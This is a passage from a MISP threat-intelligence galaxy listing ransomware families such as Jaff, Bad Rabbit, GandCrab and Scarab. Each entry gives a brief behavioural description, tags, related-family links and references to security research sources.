similar: misp-galaxy:ransomware="GNL Locker" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Zyklon" with estimative-language:likelihood-probability="likely"

Table 5722. Table References
Links
http://id-ransomware.blogspot.com/2016/05/zyklon-locker-ransomware-windows-250.html

vxLock

Ransomware

The tag is: misp-galaxy:ransomware="vxLock"

Table 5723. Table References
Links
https://id-ransomware.blogspot.com/2017/01/vxlock-ransomware.html

Jaff

We recently observed several large scale email campaigns that were attempting to distribute a new variant of ransomware that has been dubbed "Jaff". Interestingly we identified several characteristics that we have previously observed being used during Dridex and Locky campaigns. In a short period of time, we observed multiple campaigns featuring high volumes of malicious spam emails being distributed, each using a PDF attachment with an embedded Microsoft Word document functioning as the initial downloader for the Jaff ransomware.

The tag is: misp-galaxy:ransomware="Jaff"

View relationships graph

Jaff has relationships with:

similar: misp-galaxy:malpedia="Jaff" with estimative-language:likelihood-probability="likely"

Table 5724. Table References
Links
http://blog.talosintelligence.com/2017/05/jaff-ransomware.html
https://www.bleepingcomputer.com/news/security/jaff-ransomware-distributed-via-necurs-malspam-and-asking-for-a-3-700-ransom/
http://id-ransomware.blogspot.com/2017/05/jaff-ransomware.html

Uiwix Ransomware

Using EternalBlue SMB Exploit To Infect Victims

The tag is: misp-galaxy:ransomware="Uiwix Ransomware"

Uiwix Ransomware is also known as:

UIWIX

Table 5725. Table References
Links
https://www.bleepingcomputer.com/news/security/uiwix-ransomware-using-eternalblue-smb-exploit-to-infect-victims/
http://id-ransomware.blogspot.com/2017/05/uiwix-ransomware.html

SOREBRECT

Fileless, Code-injecting Ransomware

The tag is: misp-galaxy:ransomware="SOREBRECT"

Table 5726. Table References
Links
http://blog.trendmicro.com/trendlabs-security-intelligence/analyzing-fileless-code-injecting-sorebrect-ransomware/

Cyron

claims it detected "Children Pornsites" in your browser history

The tag is: misp-galaxy:ransomware="Cyron"

Table 5727. Table References
Links
https://twitter.com/struppigel/status/899524853426008064
https://id-ransomware.blogspot.com/2017/08/cyron-ransomware.html

Kappa

Made with OXAR builder; decryptable

The tag is: misp-galaxy:ransomware="Kappa"

Table 5728. Table References
Links
https://twitter.com/struppigel/status/899528477824700416

Trojan Dz

CyberSplitter variant

The tag is: misp-galaxy:ransomware="Trojan Dz"

Table 5729. Table References
Links
https://twitter.com/struppigel/status/899537940539478016

Xolzsec

ransomware written by self proclaimed script kiddies that should really be considered trollware

The tag is: misp-galaxy:ransomware="Xolzsec"

Table 5730. Table References
Links
https://twitter.com/struppigel/status/899916577252028416
http://id-ransomware.blogspot.com/2017/08/xolzsec-ransomware.html

FlatChestWare

HiddenTear variant; decryptable

The tag is: misp-galaxy:ransomware="FlatChestWare"

Table 5731. Table References
Links
https://twitter.com/struppigel/status/900238572409823232
https://id-ransomware.blogspot.com/2017/08/flatchestware-ransomware.html

SynAck

The ransomware does not use a customized desktop wallpaper to signal its presence, and the only way to discover that SynAck has infected your PC is by the ransom notes dropped on the user’s desktop, named in the format: RESTORE_INFO-[id].txt. For example: RESTORE_INFO-4ABFA0EF.txt In addition, SynAck also appends its own extension at the end of all files it encrypted. This file extensions format is ten random alpha characters for each file. For example: test.jpg.XbMiJQiuoh. Experts believe the group behind SynAck uses RDP brute-force attacks to access remote computers and manually download and install the ransomware.

The tag is: misp-galaxy:ransomware="SynAck"

SynAck is also known as:

Syn Ack

View relationships graph

SynAck has relationships with:

similar: misp-galaxy:malpedia="SynAck" with estimative-language:likelihood-probability="likely"

Table 5732. Table References
Links
https://www.bleepingcomputer.com/news/security/synack-ransomware-sees-huge-spike-in-activity/
https://www.bleepingcomputer.com/news/security/synack-ransomware-uses-process-doppelg-nging-technique/
https://id-ransomware.blogspot.com/2017/09/synack-ransomware.html

SyncCrypt

A new ransomware called SyncCrypt was discovered by Emsisoft security researcher xXToffeeXx that is being distributed by spam attachments containing WSF files. When installed these attachments will encrypt a computer and append the .kk extension to encrypted files.

The tag is: misp-galaxy:ransomware="SyncCrypt"

View relationships graph

SyncCrypt has relationships with:

similar: misp-galaxy:malpedia="SyncCrypt" with estimative-language:likelihood-probability="likely"

Table 5733. Table References
Links
https://www.bleepingcomputer.com/news/security/synccrypt-ransomware-hides-inside-jpg-files-appends-kk-extension/
http://id-ransomware.blogspot.com/2017/08/synccrypt-ransomware.html

Bad Rabbit

On October 24, 2017, Cisco Talos was alerted to a widescale ransomware campaign affecting organizations across eastern Europe and Russia. As was the case in previous situations, we quickly mobilized to assess the situation and ensure that customers remain protected from this and other threats as they emerge across the threat landscape. There have been several large scale ransomware campaigns over the last several months. This appears to have some similarities to Nyetya in that it is also based on Petya ransomware. Major portions of the code appear to have been rewritten. The distribution does not appear to have the sophistication of the supply chain attacks we have seen recently.

The tag is: misp-galaxy:ransomware="Bad Rabbit"

Bad Rabbit is also known as:

BadRabbit
Bad-Rabbit

View relationships graph

Bad Rabbit has relationships with:

similar: misp-galaxy:malpedia="EternalPetya" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:tool="NotPetya" with estimative-language:likelihood-probability="likely"

Table 5734. Table References
Links
http://blog.talosintelligence.com/2017/10/bad-rabbit.html
https://id-ransomware.blogspot.com/2017/10/badrabbit-ransomware.html
https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/
https://securelist.com/bad-rabbit-ransomware/82851/
http://www.intezer.com/notpetya-returns-bad-rabbit/

Halloware

A malware author by the name of Luc1F3R is peddling a new ransomware strain called Halloware for the lowly price of $40. Based on evidence gathered by Bleeping Computer, Luc1F3R started selling his ransomware this week, beginning Thursday.

The tag is: misp-galaxy:ransomware="Halloware"

Table 5735. Table References
Links
https://www.bleepingcomputer.com/news/security/halloware-ransomware-on-sale-on-the-dark-web-for-only-40/
http://id-ransomware.blogspot.com/2017/11/halloware-ransomware.html

StorageCrypt

Recently BleepingComputer has received a flurry of support requests for a new ransomware being named StorageCrypt that is targeting NAS devices such as the Western Digital My Cloud. Victims have been reporting that their files have been encrypted and a note left with a ransom demand of between .4 and 2 bitcoins to get their files back. User’s have also reported that each share on their NAS device contains a Autorun.inf file and a Windows executable named 美女与野兽.exe, which translates to Beauty and the beast. From the samples BleepingComputer has received, this Autorun.inf is an attempt to spread the 美女与野兽.exe file to other computers that open the folders on the NAS devices.

The tag is: misp-galaxy:ransomware="StorageCrypt"

Table 5736. Table References
Links
https://www.bleepingcomputer.com/news/security/storagecrypt-ransomware-infecting-nas-devices-using-sambacry/
https://id-ransomware.blogspot.com/2017/11/storagecrypter.html

HC7

A new ransomware called HC7 is infecting victims by hacking into Windows computers that are running publicly accessible Remote Desktop services. Once the developers gain access to the hacked computer, the HC7 ransomware is then installed on all accessible computers on the network. Originally released as HC6, victims began posting about it in the BleepingComputer forums towards the end of November. As this is a Python-to-exe executable, once the script was extracted ID Ransomware creator Michael Gillespie was able determine that it was decryptable and released a decryptor. Unfortunately, a few days later, the ransomware developers released a new version called HC7 that was not decryptable. Thi sis because they removed the hard coded encryption key and instead switched to inputting the key as a command line argument when the attackers run the ransomware executable. Thankfully, there may be a way to get around that as well so that victims can recover their keys.

The tag is: misp-galaxy:ransomware="HC7"

Table 5737. Table References
Links
https://www.bleepingcomputer.com/news/security/hc7-gotya-ransomware-installed-via-remote-desktop-services-spread-with-psexec/
https://id-ransomware.blogspot.com/2017/12/hc7-ransomware.html

HC6

Predecessor of HC7

The tag is: misp-galaxy:ransomware="HC6"

Table 5738. Table References
Links
https://twitter.com/demonslay335/status/935622942737817601?ref_src=twsrc%5Etfw
https://www.bleepingcomputer.com/news/security/hc7-gotya-ransomware-installed-via-remote-desktop-services-spread-with-psexec/
http://id-ransomware.blogspot.com/2017/11/hc6-ransomware.html

qkG

Security researchers have discovered a new ransomware strain named qkG that targets only Office documents for encryption and infects the Word default document template to propagate to new Word documents opened through the same Office suite on the same computer.

The tag is: misp-galaxy:ransomware="qkG"

qkG is also known as:

Table 5739. Table References
Links
https://www.bleepingcomputer.com/news/security/qkg-ransomware-encrypts-only-word-documents-hides-and-spreads-via-macros/
http://id-ransomware.blogspot.com/2017/11/qkg-ransomware.html

Scarab

The Scarab ransomware is a relatively new ransomware strain that was first spotted by security researcher Michael Gillespie in June this year. Written in Delphi, the first version was simplistic and was recognizable via the ".scarab" extension it appended after the names of encrypted files. Malwarebytes researcher Marcelo Rivera spotted a second version in July that used the ".scorpio" extension. The version spotted with the Necurs spam today has reverted back to using the .scarab extension. The current version of Scarab encrypts files but does not change original file names as previous versions. This Scarab version appends each file’s name with the ".[suupport@protonmail.com].scarab" extension. Scarab also deletes shadow volume copies and drops a ransom note named "IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT" on users' computers, which it opens immediately.

The tag is: misp-galaxy:ransomware="Scarab"

Table 5740. Table References
Links
https://www.bleepingcomputer.com/news/security/scarab-ransomware-pushed-via-massive-spam-campaign/
https://labsblog.f-secure.com/2017/11/23/necurs-business-is-booming-in-a-new-partnership-with-scarab-ransomware/
https://blogs.forcepoint.com/security-labs/massive-email-campaign-spreads-scarab-ransomware
https://twitter.com/malwrhunterteam/status/933643147766321152
https://myonlinesecurity.co.uk/necurs-botnet-malspam-delivering-a-new-ransomware-via-fake-scanner-copier-messages/
https://twitter.com/demonslay335/status/1006222754385924096
https://twitter.com/demonslay335/status/1006908267862396928
https://twitter.com/demonslay335/status/1007694117449682945
https://twitter.com/demonslay335/status/1049316344183836672
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-12th-2018-notpetya-gandcrab-and-more/
https://twitter.com/Amigo_A_/status/1039105453735784448
https://twitter.com/GrujaRS/status/1072057088019496960
http://id-ransomware.blogspot.com/2017/06/scarab-ransomware.html

File Spider

A new ransomware called File Spider is being distributed through spam that targets victims in Bosnia and Herzegovina, Serbia, and Croatia. These spam emails contains malicious Word documents that will download and install the File Spider ransomware onto a victims computer.File Spider is currently being distributed through malspam that appears to be targeting countries such as Croatia, Bosnia and Herzegovina, and Serbia. The spam start with subjects like"Potrazivanje dugovanja", which translates to "Debt Collection" and whose message, according to Google Translate, appear to be in Serbian.

The tag is: misp-galaxy:ransomware="File Spider"

File Spider is also known as:

Spider

Table 5741. Table References
Links
https://www.bleepingcomputer.com/news/security/file-spider-ransomware-targeting-the-balkans-with-malspam/
http://id-ransomware.blogspot.com/2017/12/file-spider-ransomware.html

FileCoder

A barely functional piece of macOS ransomware, written in Swift.

The tag is: misp-galaxy:ransomware="FileCoder"

FileCoder is also known as:

FindZip
Patcher

View relationships graph

FileCoder has relationships with:

similar: misp-galaxy:ransomware="Patcher" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Patcher" with estimative-language:likelihood-probability="likely"

Table 5742. Table References
Links
https://objective-see.com/blog/blog_0x25.html#FileCoder

MacRansom

A basic piece of macOS ransomware, offered via a 'malware-as-a-service' model.

The tag is: misp-galaxy:ransomware="MacRansom"

View relationships graph

MacRansom has relationships with:

similar: misp-galaxy:malpedia="MacRansom" with estimative-language:likelihood-probability="likely"

Table 5743. Table References
Links
https://objective-see.com/blog/blog_0x25.html

GandCrab

A new ransomware called GandCrab was released towards the end of last week that is currently being distributed via exploit kits. GandCrab has some interesting features not seen before in a ransomware, such as being the first to accept the DASH currency and the first to utilize the Namecoin powered .BIT tld.

The tag is: misp-galaxy:ransomware="GandCrab"

View relationships graph

GandCrab has relationships with:

dropped-by: misp-galaxy:exploit-kit="Fallout" with estimative-language:likelihood-probability="almost-certain"

Table 5744. Table References
Links
https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-distributed-by-exploit-kits-appends-gdcb-extension/
https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-being-distributed-via-malspam-disguised-as-receipts/
https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-version-2-released-with-new-crab-extension-and-other-changes/
https://www.bleepingcomputer.com/news/security/gandcrab-version-3-released-with-autorun-feature-and-desktop-background/
https://www.bleepingcomputer.com/news/security/new-fallout-exploit-kit-drops-gandcrab-ransomware-or-redirects-to-pups/
https://www.bleepingcomputer.com/news/security/gandcrab-v5-ransomware-utilizing-the-alpc-task-scheduler-exploit/
https://id-ransomware.blogspot.com/2018/01/gandcrab-ransomware.html

ShurL0ckr

Security researchers uncovered a new ransomware named ShurL0ckr (detected by Trend Micro as RANSOM_GOSHIFR.B) that reportedly bypasses detection mechanisms of cloud platforms. Like Cerber and Satan, ShurL0ckr’s operators further monetize the ransomware by peddling it as a turnkey service to fellow cybercriminals, allowing them to earn additional income through a commission from each victim who pays the ransom.

The tag is: misp-galaxy:ransomware="ShurL0ckr"

Table 5745. Table References
Links
https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/shurl0ckr-ransomware-as-a-service-peddled-on-dark-web-can-reportedly-bypass-cloud-applications

Cryakl

ransomware

The tag is: misp-galaxy:ransomware="Cryakl"

View relationships graph

Cryakl has relationships with:

similar: misp-galaxy:ransomware="Offline ransomware" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Cryakl" with estimative-language:likelihood-probability="likely"

Table 5746. Table References
Links
https://sensorstechforum.com/fr/fairytail-files-virus-cryakl-ransomware-remove-restore-data/
https://www.technologynews.tech/cryakl-ransomware-virus
http://www.zdnet.com/article/cryakl-ransomware-decryption-keys-now-available-for-free/

Thanatos

first ransomware seen to ask for payment to be made in Bitcoin Cash (BCH)

The tag is: misp-galaxy:ransomware="Thanatos"

View relationships graph

Thanatos has relationships with:

similar: misp-galaxy:malpedia="Thanatos" with estimative-language:likelihood-probability="likely"

Table 5747. Table References
Links
https://mobile.twitter.com/EclecticIQ/status/968478323889332226
https://www.eclecticiq.com/resources/thanatos—ransomware-first-ransomware-ask-payment-bitcoin-cash?type=intel-report
http://id-ransomware.blogspot.com/2018/02/thanatos-ransomware.html

RSAUtil

RSAUtil is distributed by the developer hacking into remote desktop services and uploading a package of files. This package contains a variety of tools, a config file that determines how the ransomware executes, and the ransomware itself.

The tag is: misp-galaxy:ransomware="RSAUtil"

RSAUtil is also known as:

Vagger
DONTSLIP

Table 5748. Table References
Links
https://www.securityweek.com/rsautil-ransomware-distributed-rdp-attacks
https://www.bleepingcomputer.com/news/security/rsautil-ransomware-helppme-india-com-installed-via-hacked-remote-desktop-services/
http://id-ransomware.blogspot.lu/2017/04/rsautil-ransomware.html
http://id-ransomware.blogspot.lu/2017/04/

Qwerty Ransomware

A new ransomware has been discovered that utilizes the legitimate GnuPG, or GPG, encryption program to encrypt a victim’s files. Currently in the wild, this ransomware is called Qwerty Ransomware and will encrypt a victims files, overwrite the originals, and the append the .qwerty extension to an encrypted file’s name.

The tag is: misp-galaxy:ransomware="Qwerty Ransomware"

Table 5749. Table References
Links
https://www.bleepingcomputer.com/news/security/qwerty-ransomware-utilizes-gnupg-to-encrypt-a-victims-files/

Zenis Ransomware

A new ransomware was discovered this week by MalwareHunterTeam called Zenis Ransomware. While it is currently unknown how Zenis is being distributed, multiple victims have already become infected with this ransomware. What is most disturbing about Zenis is that it not encrypts your files, but also purposely deletes your backups.

The tag is: misp-galaxy:ransomware="Zenis Ransomware"

Table 5750. Table References
Links
https://www.bleepingcomputer.com/news/security/zenis-ransomware-encrypts-your-data-and-deletes-your-backups/
https://id-ransomware.blogspot.com/2018/03/zenis-ransomware.html

Flotera Ransomware

The tag is: misp-galaxy:ransomware="Flotera Ransomware"

Table 5751. Table References
Links
https://www.bleepingcomputer.com/news/security/author-of-polski-vortex-and-flotera-ransomware-families-arrested-in-poland/
http://id-ransomware.blogspot.com/2017/03/flotera-ransomware.html

Black Ruby

A new ransomware was discovered this week by MalwareHunterTeam called Black Ruby. This ransomware will encrypt the files on a computer, scramble the file name, and then append the BlackRuby extension. To make matters worse, Black Ruby will also install a Monero miner on the computer that utilizes as much of the CPU as it can. Discovered on February 6, 2018. May have been distributed through unknown vectors. Will not encrypt a machine if its IP address is identified as coming from Iran; this feature enables actors to avoid a particular Iranian cybercrime law that prohibits Iran-based actors from attacking Iranian victims. Encrypts files on the infected machine, scrambles files, and appends the .BlackRuby extension to them. Installs a Monero miner on the infected computer that utilizes the machine’s maximum CPU power. Delivers a ransom note in English asking for US$650 in Bitcoins. Might be installed via Remote Desktop Services.

The tag is: misp-galaxy:ransomware="Black Ruby"

Black Ruby is also known as:

BlackRuby

Table 5752. Table References
Links
https://www.bleepingcomputer.com/news/security/black-ruby-ransomware-skips-victims-in-iran-and-adds-a-miner-for-good-measure/
https://www.accenture.com/t20180803T064557Zw/us-en/_acnmedia/PDF-83/Accenture-Cyber-Threatscape-Report-2018.pdf[https://www.accenture.com/t20180803T064557Zw/us-en/_acnmedia/PDF-83/Accenture-Cyber-Threatscape-Report-2018.pdf]

WhiteRose

A new ransomware has been discovered by MalwareHunterTeam that is based off of the InfiniteTear ransomware family, of which BlackRuby and Zenis are members. When this ransomware infects a computer it will encrypt the files, scramble the filenames, and append the .WHITEROSE extension to them.

The tag is: misp-galaxy:ransomware="WhiteRose"

Table 5753. Table References
Links
https://www.bleepingcomputer.com/news/security/the-whiterose-ransomware-is-decryptable-and-tells-a-strange-story/
http://id-ransomware.blogspot.com/2018/03/whiterose-ransomware.html

PUBG Ransomware

In what could only be a joke, a new ransomware has been discovered called "PUBG Ransomware" that will decrypt your files if you play the game called PlayerUnknown’s Battlegrounds. Discovered by MalwareHunterTeam, when the PUBG Ransomware is launched it will encrypt a user’s files and folders on the user’s desktop and append the .PUBG extension to them. When it has finished encrypting the files, it will display a screen giving you two methods that you can use to decrypt the encrypted files.

The tag is: misp-galaxy:ransomware="PUBG Ransomware"

Table 5754. Table References
Links
https://www.bleepingcomputer.com/news/security/pubg-ransomware-decrypts-your-files-if-you-play-playerunknowns-battlegrounds/
https://id-ransomware.blogspot.com/2018/04/pubg-ransomware.html

LockCrypt

LockCrypt is an example of yet another simple ransomware created and used by unsophisticated attackers. Its authors ignored well-known guidelines about the proper use of cryptography. The internal structure of the application is also unprofessional. Sloppy, unprofessional code is pretty commonplace when ransomware is created for manual distribution. Authors don’t take much time preparing the attack or the payload. Instead, they’re rather focused on a fast and easy gain, rather than on creating something for the long run. Because of this, they could easily be defeated.

The tag is: misp-galaxy:ransomware="LockCrypt"

Table 5755. Table References
Links
https://www.bleepingcomputer.com/news/security/lockcrypt-ransomware-cracked-due-to-bad-crypto/
https://twitter.com/malwrhunterteam/status/1034436350748053504
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/
http://id-ransomware.blogspot.com/2017/06/lockcrypt-ransomware.html

Magniber Ransomware

Magniber is a new ransomware being distributed by the Magnitude Exploit Kit that appears to be the successor to the Cerber Ransomware. While many aspects of the Magniber Ransomware are different than Cerber, the payment system and the files it encrypts are very similar.

The tag is: misp-galaxy:ransomware="Magniber Ransomware"

Table 5756. Table References
Links
https://www.bleepingcomputer.com/news/security/decrypters-for-some-versions-of-magniber-ransomware-released/
https://www.bleepingcomputer.com/news/security/goodbye-cerber-hello-magniber-ransomware/
https://twitter.com/demonslay335/status/1005133410501787648
http://id-ransomware.blogspot.com/2017/10/my-decryptor-ransomware.html

Vurten

The tag is: misp-galaxy:ransomware="Vurten"

Table 5757. Table References
Links
https://twitter.com/siri_urz/status/981191281195044867
http://id-ransomware.blogspot.com/2018/04/vurten-ransomware.html

Reveton ransomware

A ransomware family that targets users from certain countries or regions. It locks the computer and displays a location-specific webpage that covers the desktop and demands that the user pay a fine for the supposed possession of illicit material. The Reveton ransomware is one of the first screen-locking ransomware strains, and it appeared when Bitcoin was still in its infancy, and before it became the cryptocurrency of choice in all ransomware operations. Instead, Reveton operators asked victims to buy GreenDot MoneyPak vouchers, take the code on the voucher and enter it in the Reveton screen locker.

The tag is: misp-galaxy:ransomware="Reveton ransomware"

Table 5758. Table References
Links
https://www.bleepingcomputer.com/news/security/microsoft-engineer-charged-in-reveton-ransomware-case/
https://en.wikipedia.org/wiki/Ransomware#Reveton
https://nakedsecurity.sophos.com/2012/08/29/reveton-ransomware-exposed-explained-and-eliminated/

Fusob

Fusob is one of the major mobile ransomware families. Between April 2015 and March 2016, about 56 percent of accounted mobile ransomware was Fusob. Like a typical mobile ransomware, it employs scare tactics to extort people to pay a ransom. The program pretends to be an accusatory authority, demanding the victim to pay a fine from $100 to $200 USD or otherwise face a fictitious charge. Rather surprisingly, Fusob suggests using iTunes gift cards for payment. Also, a timer clicking down on the screen adds to the users’ anxiety as well. In order to infect devices, Fusob masquerades as a pornographic video player. Thus, victims, thinking it is harmless, unwittingly download Fusob. When Fusob is installed, it first checks the language used in the device. If it uses Russian or certain Eastern European languages, Fusob does nothing. Otherwise, it proceeds on to lock the device and demand ransom. Among victims, about 40% of them are in Germany with the United Kingdom and the United States following with 14.5% and 11.4% respectively. Fusob has lots in common with Small, which is another major family of mobile ransomware. They represented over 93% of mobile ransomwares between 2015 and 2016.

The tag is: misp-galaxy:ransomware="Fusob"

Table 5759. Table References
Links
https://en.wikipedia.org/wiki/Ransomware#Fusob

OXAR

The tag is: misp-galaxy:ransomware="OXAR"

Table 5760. Table References
Links
https://twitter.com/demonslay335/status/981270787905720320

BansomQare Manna Ransomware

The tag is: misp-galaxy:ransomware="BansomQare Manna Ransomware"

Table 5761. Table References
Links
http://id-ransomware.blogspot.com/2018/03/bansomqarewanna-ransomware.html

Haxerboi Ransomware

The tag is: misp-galaxy:ransomware="Haxerboi Ransomware"

SkyFile

The tag is: misp-galaxy:ransomware="SkyFile"

Table 5762. Table References
Links
https://twitter.com/malwrhunterteam/status/982229994364547073
http://id-ransomware.blogspot.com/2018/04/skyfile-ransomware.html

MC Ransomware

Supposed joke ransomware, decrypt when running an exectable with the string "Minecraft"

The tag is: misp-galaxy:ransomware="MC Ransomware"

Table 5763. Table References
Links
https://www.bleepingcomputer.com/news/security/minecraft-and-cs-go-ransomware-strive-for-media-attention/

CSGO Ransomware

Supposed joke ransomware, decrypt when running an exectable with the string "csgo"

The tag is: misp-galaxy:ransomware="CSGO Ransomware"

Table 5764. Table References
Links
https://www.bleepingcomputer.com/news/security/minecraft-and-cs-go-ransomware-strive-for-media-attention/

XiaoBa ransomware

The tag is: misp-galaxy:ransomware="XiaoBa ransomware"

Table 5765. Table References
Links
https://www.bleepingcomputer.com/news/security/xiaoba-ransomware-retooled-as-coinminer-but-manages-to-ruin-your-files-anyway/
https://twitter.com/malwrhunterteam/status/923847744137154560
https://twitter.com/struppigel/status/926748937477939200
https://twitter.com/demonslay335/status/968552114787151873
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-june-8th-2018-crybrazil-cryptconsole-and-magniber/
https://twitter.com/malwrhunterteam/status/1004048636530094081
https://id-ransomware.blogspot.com/2017/10/xiaoba-ransomware.html

NMCRYPT Ransomware

The NMCRYPT Ransomware is a generic file encryption Trojan that was detected in the middle of April 2018. The NMCRYPT Ransomware is a file encoder Trojan that is designed to make data unreadable and convince users to pay a fee for unlocking content on the infected computers. The NMCRYPT Ransomware is nearly identical to hundreds of variants of the HiddenTear open-source ransomware and compromised users are unable to use the Shadow Volume snapshots made by Windows to recover. Unfortunately, the NMCRYPT Ransomware disables the native recovery features on Windows, and you need third-party applications to rebuild your data.

The tag is: misp-galaxy:ransomware="NMCRYPT Ransomware"

Table 5766. Table References
Links
https://sensorstechforum.com/nmcrypt-files-ransomware-virus-remove-restore-data/
https://www.enigmasoftware.com/nmcryptansomware-removal/

Iron

It is currently unknown if Iron is indeed a new variant by the same creators of Maktub, or if it was simply inspired by the latter, by copying the design for the payment portal for example. We know the Iron ransomware has mimicked at least three ransomware families:Maktub (payment portal design) DMA Locker (Iron Unlocker, decryption tool) Satan (exclusion list)

The tag is: misp-galaxy:ransomware="Iron"

Table 5767. Table References
Links
https://bartblaze.blogspot.lu/2018/04/maktub-ransomware-possibly-rebranded-as.html
http://id-ransomware.blogspot.com/2018/04/ironlocker-ransomware.html

Tron ransomware

The tag is: misp-galaxy:ransomware="Tron ransomware"

Table 5768. Table References
Links
https://twitter.com/malwrhunterteam/status/985152346773696512
http://id-ransomware.blogspot.com/2018/04/tron-ransomware.html

Unnamed ramsomware 1

A new in-development ransomware was discovered that has an interesting characteristic. Instead of the distributed executable performing the ransomware functionality, the executables compiles an embedded encrypted C# program at runtime and launches it directly into memory.

The tag is: misp-galaxy:ransomware="Unnamed ramsomware 1"

Table 5769. Table References
Links
https://www.bleepingcomputer.com/news/security/new-c-ransomware-compiles-itself-at-runtime/

HPE iLO 4 Ransomware

Attackers are targeting Internet accessible HPE iLO 4 remote management interfaces, supposedly encrypting the hard drives, and then demanding Bitcoins to get access to the data again. According to the victim, the attackers are demanding 2 bitcoins to gain access to the drives again. The attackers will also provide a bitcoin address to the victim that should be used for payment. These bitcoin addresses appear to be unique per victim as the victim’s was different from other reported ones. An interesting part of the ransom note is that the attackers state that the ransom price is not negotiable unless the victim’s are from Russia. This is common for Russian based attackers, who in many cases tries to avoid infecting Russian victims. Finally, could this be a decoy/wiper rather than an actual true ransomware attack? Ransomware attacks typically provide a unique ID to the victim in order to distinguish one victim from another. This prevents a victim from "stealing" another victim’s payment and using it to unlock their computer. In a situation like this, where no unique ID is given to identify the encrypted computer and the email is publicly accessible, it could be a case where the main goal is to wipe a server or act as a decoy for another attack.

The tag is: misp-galaxy:ransomware="HPE iLO 4 Ransomware"

Table 5770. Table References
Links
https://www.bleepingcomputer.com/news/security/ransomware-hits-hpe-ilo-remote-management-interfaces/
https://twitter.com/M_Shahpasandi/status/989157283799162880
https://id-ransomware.blogspot.com/2018/04/hpe-ilo-ransomware.html

Sigrun Ransomware

When Sigrun is executed it will first check "HKEY_CURRENT_USER\Keyboard Layout\Preload" to see if it is set to the Russian layout. If the computer is using a Russian layout, it will not encrypt the computer and just delete itself. Otherwise Sigrun will scan a computer for files to encrypt and skip any that match certain extensions, filenames, or are located in particular folders.

The tag is: misp-galaxy:ransomware="Sigrun Ransomware"

Table 5771. Table References
Links
https://www.bleepingcomputer.com/news/security/sigrun-ransomware-author-decrypting-russian-victims-for-free/
http://id-ransomware.blogspot.com/2018/05/sigrun-ransomware.html

CryBrazil

Mostly Hidden Tear with some codes from Eda2 & seems compiled w/ Italian VS. Maybe related to OpsVenezuela?

The tag is: misp-galaxy:ransomware="CryBrazil"

Table 5772. Table References
Links
https://twitter.com/malwrhunterteam/status/1002953824590614528
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-june-8th-2018-crybrazil-cryptconsole-and-magniber/
https://id-ransomware.blogspot.com/2018/06/crybrazil-ransomware.html

Pedcont

new destrucrtive ransomware called Pedcont that claims to encrypt files because the victim has accessed illegal content on the deep web. The screen then goes blank and becomes unresponsive.

The tag is: misp-galaxy:ransomware="Pedcont"

Table 5773. Table References
Links
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-june-8th-2018-crybrazil-cryptconsole-and-magniber/ [https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-june-8th-2018-crybrazil-cryptconsole-and-magniber/ ]
http://id-ransomware.blogspot.com/2018/06/pedcont-ransomware.html

DiskDoctor

new Scarab Ransomware variant called DiskDoctor that appends the .DiskDoctor extension and drops a ransom note named HOW TO RECOVER ENCRYPTED FILES.TXT

The tag is: misp-galaxy:ransomware="DiskDoctor"

DiskDoctor is also known as:

Scarab-DiskDoctor

Table 5774. Table References
Links
https://id-ransomware.blogspot.com/2018/06/scarab-diskdoctor-ransomware.html
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-june-8th-2018-crybrazil-cryptconsole-and-magniber/

RedEye

Jakub Kroustek discovered the RedEye Ransomware, which appends the .RedEye extension and wipes the contents of the files. RedEye can also rewrite the MBR with a screen that gives authors contact info and YouTube channel. Bart also wrote an article on this ransomware detailing how it works and what it does on a system.The ransomware author contacted BleepingComputer and told us that this ransomware was never intended for distribution and was created just for fun.

The tag is: misp-galaxy:ransomware="RedEye"

Table 5775. Table References
Links
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-june-8th-2018-crybrazil-cryptconsole-and-magniber/
https://twitter.com/JakubKroustek/status/1004463935905509376
https://bartblaze.blogspot.com/2018/06/redeye-ransomware-theres-more-than.html
https://id-ransomware.blogspot.com/2018/06/redeye-ransomware.html

Aurora Ransomware

Typical ransom software, Aurora virus plays the role of blackmailing PC operators. It encrypts files and the encryption cipher it uses is pretty strong. After encryption, the virus attaches .aurora at the end of the file names that makes it impossible to open the data. Thereafter, it dispatches the ransom note totaling 6 copies, without any change to the main objective i.e., victims must write an electronic mail addressed to anonimus.mr@yahoo.com while stay connected until the criminals reply telling the ransom amount.

The tag is: misp-galaxy:ransomware="Aurora Ransomware"

Aurora Ransomware is also known as:

Zorro Ransomware

Table 5776. Table References
Links
https://www.spamfighter.com/News-21588-Aurora-Ransomware-Circulating-the-Cyber-Space.htm
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-june-8th-2018-crybrazil-cryptconsole-and-magniber/
https://twitter.com/demonslay335/status/1004435398687379456
https://www.bleepingcomputer.com/news/security/aurora-zorro-ransomware-actively-being-distributed/
https://id-ransomware.blogspot.com/2018/05/aurora-ransomware.html

PGPSnippet Ransomware

The tag is: misp-galaxy:ransomware="PGPSnippet Ransomware"

Table 5777. Table References
Links
https://twitter.com/demonslay335/status/1005138187621191681

Spartacus Ransomware

The tag is: misp-galaxy:ransomware="Spartacus Ransomware"

Table 5778. Table References
Links
https://twitter.com/demonslay335/status/1005136022282428419
https://id-ransomware.blogspot.com/2018/04/spartacus-ransomware.html

Donut

S!Ri found a new ransomware called Donut that appends the .donut extension and uses the email donutmmm@tutanota.com.

The tag is: misp-galaxy:ransomware="Donut"

Table 5779. Table References
Links
https://twitter.com/siri_urz/status/1005438610806583296
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-june-15th-2018-dbger-scarab-and-more/
